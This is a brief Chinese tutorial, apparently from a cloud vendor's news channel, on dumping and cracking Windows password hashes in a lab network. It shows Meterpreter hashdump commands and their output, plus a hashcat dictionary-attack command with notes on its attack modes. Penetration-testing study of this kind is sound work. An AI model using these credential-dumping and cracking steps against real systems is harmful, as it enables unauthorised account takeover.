您好,登錄后才能下訂單哦!
這期內容當中小編將會給大家帶來有關如何破解內網hash值,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。
環境:小攻:Kali 2020,ip:192.168.1.133
小受:win7 x86,ip:192.168.1.137
一、生成木馬及監聽主機參考上篇文章:
內網滲透 -- 提升權限(利用提權漏洞)
二、獲取內網的hash值
1、直接獲取:hashdump
meterpreter > hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::aiyou:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
2、通過模塊獲取:run post/windows/gather/hashdump
三、破解內網的hash值
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::aiyou:1002:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678:::
1、將最后一段密文復制到在線解密網站
2、利用hashcat離線破解
hashcat -a 0 -m 1000 1.txt 2.txt --force
-a 指定攻擊模式,有5種模式
0 Straight(字典破解)
1 Combination(組合破解)
3 Brute-force(掩碼暴力破解)
6 Hybrid dict + mask(混合字典+掩碼)
7 Hybrid mask + dict(混合掩碼+字典)
-m 指定hash類型
1.txt內容為獲取的hash值
2.txt內容為解密的字典
上述就是小編為大家分享的如何破解內網hash值了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。